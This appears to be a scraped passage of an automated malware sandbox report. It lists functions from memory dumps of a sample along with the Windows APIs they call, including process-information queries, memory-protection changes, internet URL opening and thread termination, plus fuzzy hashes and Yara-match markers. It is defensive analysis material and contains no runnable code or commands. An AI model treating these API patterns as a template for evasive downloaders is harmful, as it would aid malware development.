Opcode Fuzzy Hash: 5ce084e20be2f5ec8d5d940fffba25da08ad1e8808a4c1b3c29999ab91fb7f7d
Instruction Fuzzy Hash: D801F73373D302CFEF3A072888952BC2B628F03B00B78059BE85AC6261D3254885B352

Uniqueness

Uniqueness Score: -1.00%

Function 00097190, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 42a9ada970210d07967ac3d44c0115c15ab16be0f1e63df7f7ea0b4b3d1edf77
Instruction ID: 1f5dc5aa0658001fd00ff684cbfdc69093ee7e7132032d9a5702c0ed65247c70
Opcode Fuzzy Hash: 42a9ada970210d07967ac3d44c0115c15ab16be0f1e63df7f7ea0b4b3d1edf77
Instruction Fuzzy Hash: 2D01442373C305CB2F3A161C4A821BC2B228B52B117B8055BAE6AD67A0E21608C0B301

Uniqueness

Uniqueness Score: -1.00%

Function 0097B0BA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0097B0F5

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: b97dba74e29ac9dddf43680f52d59086c9635f659ae7cc64a657a6b5813b5e9c
Instruction ID: bbdccb26cfcb27b7b157cd98efdc7f3b56d421ce023ebf218d821d9ffbe96da8
Opcode Fuzzy Hash: b97dba74e29ac9dddf43680f52d59086c9635f659ae7cc64a657a6b5813b5e9c
Instruction Fuzzy Hash: 2A01AD32504744DFEB20CF45DC85B61FFA0EF08720F48C49ADD894B616D375A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 000971DE, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 84dfa4a79617b83a4f021997d76eea86cabd353d1c58ed7599983738c3d45104
Instruction ID: c6315b581cd7a8053d710e19fac2728abd9788d92e83877a3d929a342059fe9c
Opcode Fuzzy Hash: 84dfa4a79617b83a4f021997d76eea86cabd353d1c58ed7599983738c3d45104
Instruction Fuzzy Hash: B7F0E22377D2028E6F7E176899842A82B538B43B003A8019BA91AD6264D2214884B301

Uniqueness

Uniqueness Score: -1.00%

Function 000971F7, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 80f1309ffd0f4c52a13a29bcf403a5afc8d735a1c7e2a8265f09ce01e2bd2112
Instruction ID: f2333d9041c1616182d2e852dcac30152ab4f2583f09bfa9a328ebc8d8339a47
Opcode Fuzzy Hash: 80f1309ffd0f4c52a13a29bcf403a5afc8d735a1c7e2a8265f09ce01e2bd2112
Instruction Fuzzy Hash: 4BF0E57373C202CF2F7E6B64898426C16539B52B05368005FFD0AD6724E52544C4F350

Uniqueness

Uniqueness Score: -1.00%

Function 0009720F, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000971F0

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 63a4ecb3c3faee87961b60b91d1a42bc21e047f128ae87dd7be58edaa9fe965b
Instruction ID: 8445f758255e8042e937cd3286003730a452c93a714d61323f73dcd337a9f5f0
Opcode Fuzzy Hash: 63a4ecb3c3faee87961b60b91d1a42bc21e047f128ae87dd7be58edaa9fe965b
Instruction Fuzzy Hash: AAE06D6267C2018F6F7F4B6889C526C2B665F82B0573444ABEC2AD6668E2264488B752

Uniqueness

Uniqueness Score: -1.00%

Function 00096A5F, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00096555,00000040,00092C3B,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00096A78

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 00B00006, Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

:@lq, xrefs: 00B002E4
:@lq, xrefs: 00B001F4
KDBM, xrefs: 00B00235

Memory Dump Source

Source File: 00000005.00000002.2351694963.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID: :@lq$:@lq$KDBM
API String ID: 0-2593811017
Opcode ID: 6b342adf197c2df4a6ea1c269176993b6c744db63b3220ebadb08da3b5af10db
Instruction ID: 2cf62186542a4e308efcd3d4ea0be7817273d305200a27e7c0f05d026056b202
Opcode Fuzzy Hash: 6b342adf197c2df4a6ea1c269176993b6c744db63b3220ebadb08da3b5af10db
Instruction Fuzzy Hash: A5919E30A1C386DFE741EB70DD98B49BFB1AB8A384F84C85CD0858B1A5DB700515EFA2

Uniqueness

Uniqueness Score: -1.00%

Function 000957A3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00096468,00092C3B,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0009576A

Strings

ttps, xrefs: 0009582E

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: ttps
API String ID: 1029625771-1892839723
Opcode ID: 6ac6bf5fe0c2e2605b9901b043360a24877ae5edf6147f2a14fed41df066d76c
Instruction ID: 87bbe11316250f1b46b991e98f9998e010521a00332cd936132bf5565fbe4bac
Opcode Fuzzy Hash: 6ac6bf5fe0c2e2605b9901b043360a24877ae5edf6147f2a14fed41df066d76c
Instruction Fuzzy Hash: 9A11EF72808924EFCF26DF45E9804EE7BA1AF14712B568459FC497B311D631BE90EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00095776, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00096468,00092C3B,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0009576A

Strings

_P, xrefs: 00095736

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: _P
API String ID: 1029625771-109037125
Opcode ID: d4ae8bd5a0213323e1df49e4cfa1785d92cbf71fa24da0530ccdac947de1d5ef
Instruction ID: 51f25e177a7af7e234a18b92acb43cef4bcd1d280c2a66110af94f5392837ee2
Opcode Fuzzy Hash: d4ae8bd5a0213323e1df49e4cfa1785d92cbf71fa24da0530ccdac947de1d5ef
Instruction Fuzzy Hash: DAE02B4A54DB50FB8F332AE23C950CCAE53072231332440D6F5515E763C12A0B81B790

Uniqueness

Uniqueness Score: -1.00%

Function 000942E6, Relevance: 3.1, APIs: 2, Instructions: 117networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00094A2F,00000000,00000000,00000000,00000000), ref: 00094307
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 000943FA

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 39373b6bfd9edb6ecf9de333714311ca7f1b14129e6d214ef0b2b8b3e5da28fb
Instruction ID: 90b0e0d637d4c0b2a7b6cd6e56d2dd292cb63b96df2461e10207ebaeddcb2a4a
Opcode Fuzzy Hash: 39373b6bfd9edb6ecf9de333714311ca7f1b14129e6d214ef0b2b8b3e5da28fb
Instruction Fuzzy Hash: C0419570284387EBDF308E54DD65FFE36A5AF04780F148415BE4AAB191E7718946FB21

Uniqueness

Uniqueness Score: -1.00%

Function 000942F3, Relevance: 3.1, APIs: 2, Instructions: 101networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00094A2F,00000000,00000000,00000000,00000000), ref: 00094307
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 000943FA

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 6e8b17654bc73bcce0f816f9b2df2114ac645f47f5b0e031a73595d27a4afdf9
Instruction ID: 6cadaee58076ab78dbe5f7f7c11771848aac35fe876f978f2b5f502293a8f07d
Opcode Fuzzy Hash: 6e8b17654bc73bcce0f816f9b2df2114ac645f47f5b0e031a73595d27a4afdf9
Instruction Fuzzy Hash: C431B170284347EBEF308E54DE65FFE36E59F01780F208419AE4AAB191E7718906F721

Uniqueness

Uniqueness Score: -1.00%

Function 00094334, Relevance: 3.1, APIs: 2, Instructions: 101networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00094A2F,00000000,00000000,00000000,00000000), ref: 00094307
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 000943FA

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 40f376c0d58e51e2da80ad625e3af17aedf0806201fcf13b94c728fed2e55d6d
Instruction ID: ec456e20e8f92f519d4e2d95918d1882aad6a5426cfea3bd39705d1d9d16576a
Opcode Fuzzy Hash: 40f376c0d58e51e2da80ad625e3af17aedf0806201fcf13b94c728fed2e55d6d
Instruction Fuzzy Hash: 9D31E570284347EBEF308E10DE55FFE36E59F05780F208419AE4AAB191E3718946F721

Uniqueness

Uniqueness Score: -1.00%

Function 000926DF, Relevance: 1.6, APIs: 1, Instructions: 141threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00092785

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 343c0d2b5ddecddf2de80ef8ece73a86b698ed58d6de628d48768200b331824f
Instruction ID: d948feffba5f022ee38f0bd62b337c20e35f067bd170a599715226ff26eb43bf
Opcode Fuzzy Hash: 343c0d2b5ddecddf2de80ef8ece73a86b698ed58d6de628d48768200b331824f
Instruction Fuzzy Hash: A021F87090C301EEDF319A94CDA9FAE7AA59F65364F7002A2D9535B1E3C3709582BE13

Uniqueness

Uniqueness Score: -1.00%

Function 00093E6E, Relevance: 1.6, APIs: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00093DC1,00093EB5), ref: 00093E62

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 013a10b882d7e380a1574f212b279c9d3d6b55805b098aeb4520350e3744372d
Instruction ID: 8810585828a5a596e825cdcf501271ad7fa3089ab7b23686e506050488d62e8f
Opcode Fuzzy Hash: 013a10b882d7e380a1574f212b279c9d3d6b55805b098aeb4520350e3744372d
Instruction Fuzzy Hash: 643190B1908201AEEF355694CDA5FEE3B655B21360F600171F953571D3C3619982BD16

Uniqueness

Uniqueness Score: -1.00%

Function 0009275D, Relevance: 1.6, APIs: 1, Instructions: 117threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00092785

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: ba6e95cf95657b7dfcfea7a86a61d8bd7f429f97e5a1974eab220916df95480b
Instruction ID: c8e0b553d8447540fadf62907ee12431697c77f24e68309e911986bfa1d74331
Opcode Fuzzy Hash: ba6e95cf95657b7dfcfea7a86a61d8bd7f429f97e5a1974eab220916df95480b
Instruction Fuzzy Hash: 0621477050C301FEEF35AA94C9E5BAE7AA59B65320F700261ED53672A3C3708981BA13

Uniqueness

Uniqueness Score: -1.00%

Function 0009278D, Relevance: 1.6, APIs: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00092785

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: c8184ee1133c46e9cc67da287b66860f72413de908708f431ca8ae6d3d8147e7
Instruction ID: ad6a2b6aa1a2b4ec939d892a9c8b311365409fe075da72c0d6c8989ad9cfa7bf
Opcode Fuzzy Hash: c8184ee1133c46e9cc67da287b66860f72413de908708f431ca8ae6d3d8147e7
Instruction Fuzzy Hash: 5E319CB050C311FFEF326A90C9E5BAE7A62AB31350F200161ED43672A3D3318881BA17

Uniqueness

Uniqueness Score: -1.00%

Function 00092773, Relevance: 1.6, APIs: 1, Instructions: 106threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00092785

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: fb53545aaef32638ca41926b7fe4ace137357e24638cf429d8baca78b67f5596
Instruction ID: 346e32431214f88c6791502e32b5d3e9d24150dc038ac76d6c341b375f96ea0a
Opcode Fuzzy Hash: fb53545aaef32638ca41926b7fe4ace137357e24638cf429d8baca78b67f5596
Instruction Fuzzy Hash: F821497050C301FFEF35AA94CDE5FAE76A59B65320F700261ED536B1A2D3708581BA17

Uniqueness

Uniqueness Score: -1.00%

Function 00094359, Relevance: 1.6, APIs: 1, Instructions: 105networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 000943FA

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: cd194a03605d180f8b838a5f781dfc275bdffbd930111ac494ca43c600036ca5
Instruction ID: b56f8ea688a4ccf177b5e2034c05e26d6ea30425d81de2ee1be0d2df43a3995a
Opcode Fuzzy Hash: cd194a03605d180f8b838a5f781dfc275bdffbd930111ac494ca43c600036ca5
Instruction Fuzzy Hash: FC31F870284347EBDF314E10DE56FFE37A69F15780F148015AE46AB552E7328947B721

Uniqueness

Uniqueness Score: -1.00%

Function 00094318, Relevance: 1.6, APIs: 1, Instructions: 103networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 000943FA

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 2bde9217dd469d60db7066f628f313f817f415813b4e17f17f2f94d28ef2a3d5
Instruction ID: 9a3656829dbb482f55b2159ffcd507e0a2b9f0948529ca38382f891203be9454
Opcode Fuzzy Hash: 2bde9217dd469d60db7066f628f313f817f415813b4e17f17f2f94d28ef2a3d5
Instruction Fuzzy Hash: 0F31F970244747EBDF314E10DE56FFE36A59F15780F148019AE4A9B592E3328A46F721

Uniqueness

Uniqueness Score: -1.00%

Function 000927B6, Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00092785

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: e9fd636017caf0f5ba913c730c9ee4f666cf1bdb437bd6341b9783d8479216d6
Instruction ID: 440f9de2ed6368771c022306fa23e597da0bf499dc1768ed8ec2c6217403a567
Opcode Fuzzy Hash: e9fd636017caf0f5ba913c730c9ee4f666cf1bdb437bd6341b9783d8479216d6
Instruction Fuzzy Hash: 3521B1B0408301FFEF35AAE4C9E5FEE7AA65B70360F300161E953672A2D33185827D16

Uniqueness

Uniqueness Score: -1.00%

Function 0097A8D9, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 0097A989

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 7e7c266193cd59ce7d7a1d92870e09dceba9c8cc8a152d7ba9a2ef2f726e5493
Instruction ID: 18d280cfde81af1e388896b2adfe0fe87d9d939e114db1f94f9522b64758b1b6
Opcode Fuzzy Hash: 7e7c266193cd59ce7d7a1d92870e09dceba9c8cc8a152d7ba9a2ef2f726e5493
Instruction Fuzzy Hash: 7D31A272504380AFE722CF11DC44F56BBBCEF45310F09859BF9859B152D264A908C772

Uniqueness

Uniqueness Score: -1.00%

Function 0009437C, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 000943FA

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: de483de68caed0569be1d2fb4fc114868920cfc23355c2dfb89eb0854dfc3ef5
Instruction ID: 659be0297719cd2c97095c2ce159b227b1868af09ffe1d4f42d02473d35655f3
Opcode Fuzzy Hash: de483de68caed0569be1d2fb4fc114868920cfc23355c2dfb89eb0854dfc3ef5
Instruction Fuzzy Hash: 4731E270284747EBEF308E14CE65FFE36A59F05780F148019AE4AAB192E3318902F721

Uniqueness

Uniqueness Score: -1.00%

Function 0097A9D1, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,51D1A3FF,00000000,00000000,00000000,00000000), ref: 0097AA8C

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 16770ae9868a3c6f0806691c9e80e772401f89c7691b983f10d59382e402ed6e
Instruction ID: 44a5a120b21a97842c833e7e1be278e2521d5cc34803caf3798a19ea066c2981
Opcode Fuzzy Hash: 16770ae9868a3c6f0806691c9e80e772401f89c7691b983f10d59382e402ed6e
Instruction Fuzzy Hash: 3431A472505780AFE721CF21CC45F96BFECEF46310F08849AE989CB153D264E949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0009274A, Relevance: 1.6, APIs: 1, Instructions: 89threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00092785

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 0af7a3fedbc7ff04da1791973a8c7ff0c85543e102f3f8bcb965f2387c897824
Instruction ID: 3bf3e508df9ed31b46bda935a21ca3d7ea0f5209cb984eab063ba292a465d86e
Opcode Fuzzy Hash: 0af7a3fedbc7ff04da1791973a8c7ff0c85543e102f3f8bcb965f2387c897824
Instruction Fuzzy Hash: D3213770508301EEEF34AA94CDA5FAE76A5AF65324F700261EE535B1A2C3709582BD13

Uniqueness

Uniqueness Score: -1.00%

Function 000943A6, Relevance: 1.6, APIs: 1, Instructions: 89networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 000943FA

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: f73ec3bd1ddf34d24c0925a231b7c4cf0dccc021e94b2c94ee1308cf100e2a4a
Instruction ID: 3232b0ccd2e7c61766578d33d67d30af51a66c4575f30942c5940675b4daef79
Opcode Fuzzy Hash: f73ec3bd1ddf34d24c0925a231b7c4cf0dccc021e94b2c94ee1308cf100e2a4a
Instruction Fuzzy Hash: 3C21B270284747ABDF308D14DE55FFE36959F117C0F148415AE4AAB152E7318A06F621

Uniqueness

Uniqueness Score: -1.00%

Function 0097B464, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EA4,51D1A3FF,00000000,00000000,00000000,00000000), ref: 0097B4FE

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: d54782e37c852fb8d73df1edab0f77ca6dd690c60bb871e06cd82b3d6807f2c7
Instruction ID: 195d5b95526d5c7689b9a27dbb7e1780bf586508059a629a9c2e3e6e488c2cfe
Opcode Fuzzy Hash: d54782e37c852fb8d73df1edab0f77ca6dd690c60bb871e06cd82b3d6807f2c7
Instruction Fuzzy Hash: DF21E6B2509380AFE712CF20DC45B96BFB8EF06320F0884DAE984DB193D274A949C771

Uniqueness

Uniqueness Score: -1.00%

Function 000943E5, Relevance: 1.6, APIs: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 000943FA

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 6d1a8cdadfc6cba198e80890242d90cd5a2f3dbcb1645ad235addeff819539fc
Instruction ID: edfdcff84c3177d146bad1a31c7d59193f58f83649c314fde29830cc55858704
Opcode Fuzzy Hash: 6d1a8cdadfc6cba198e80890242d90cd5a2f3dbcb1645ad235addeff819539fc
Instruction Fuzzy Hash: 6A21037028034BEBDF308D10CEA5FFE37969F01780F148519AE4A9B2A2E7319906F721

Uniqueness

Uniqueness Score: -1.00%

Function 000943C7, Relevance: 1.6, APIs: 1, Instructions: 84networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 000943FA

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 0e1e1a5989a9cc2c2791bfb8b61904ebc735059eb5e460a09e33fdb259f5eac7
Instruction ID: 3eaa5a3e87e059027b005942647a4c75f6b8c6caf99e77e7b7a7e7bd7689e0f4
Opcode Fuzzy Hash: 0e1e1a5989a9cc2c2791bfb8b61904ebc735059eb5e460a09e33fdb259f5eac7
Instruction Fuzzy Hash: C021C270284747EBDF308E14DEA5FFE36969F01780F148019AD4A9B252E3328A07F621

Uniqueness

Uniqueness Score: -1.00%

Function 0097B55D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EA4,51D1A3FF,00000000,00000000,00000000,00000000), ref: 0097B5EE

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 38ca2a1f95365c0890c09fbd6b0fa714d89a2a130d692fabc37c95dee3b41677
Instruction ID: 1b52deb4d35dcefdf59379103690f12f58a0a3f5f4619bb4cb168990257a634c
Opcode Fuzzy Hash: 38ca2a1f95365c0890c09fbd6b0fa714d89a2a130d692fabc37c95dee3b41677
Instruction Fuzzy Hash: A9219172505384AFE722CB11DC45FA6BFACEF46320F08849AF945DB192D764E948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0097B654, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EA4,?,?), ref: 0097B6FA

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 046d36781e41b0ecd2baf0cca6317bbca3bc2894b4a43671caab82b8c053de81
Instruction ID: 0652b970b6c2b0c2901d42779e19b8b4c517c1aad43fcc8e7e71244470087808
Opcode Fuzzy Hash: 046d36781e41b0ecd2baf0cca6317bbca3bc2894b4a43671caab82b8c053de81
Instruction Fuzzy Hash: 9021D1715093C0AFD312CB65CC55B66BFB4EF87210F0980DBD8848F2A3D224A909C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 0097B2C4, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 0097B35E

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 07bfbef5650a402b9159bf652e39d3f05eececb1e7937a27b7494779850fb6fe
Instruction ID: 4c0d1c9e874ed287d0968604ef255ba9c83ff52a5bf8a866c8d728c4de023ff8
Opcode Fuzzy Hash: 07bfbef5650a402b9159bf652e39d3f05eececb1e7937a27b7494779850fb6fe
Instruction Fuzzy Hash: 1A21D7755093C0AFD3138B25DC51B62BFB4EF87610F0A81DBE8848F693D265A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 0097A90A, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 0097A989

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 422aafa7e5b95f75301486df6a63ea2f1b9343d05737636327ebe9790dbe73c9
Instruction ID: c71ab87082d227161c76fd7c80a0f09d4273a7f288a29fde752e08ccd5399d3f
Opcode Fuzzy Hash: 422aafa7e5b95f75301486df6a63ea2f1b9343d05737636327ebe9790dbe73c9
Instruction Fuzzy Hash: 2421CF72500304EFFB20DE51DC44F6BF7ACEF44310F04895AFA499A241D664E9088AB2

Uniqueness

Uniqueness Score: -1.00%

Function 0097ACEF, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0097AD6A

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c40ce0ba870bb8699950a7596285199b222dfe8936423a9d583b97e9ca2ed136
Instruction ID: cb0f39333ef00e05462de2cc88f6186063be3374882de997eca6318a6ca43eb4
Opcode Fuzzy Hash: c40ce0ba870bb8699950a7596285199b222dfe8936423a9d583b97e9ca2ed136
Instruction Fuzzy Hash: D521B3B65093809FD722CB65DC45B96BFE8EF46210F0980DAD884CB6A3D274D808C762

Uniqueness

Uniqueness Score: -1.00%

Function 0097AA12, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

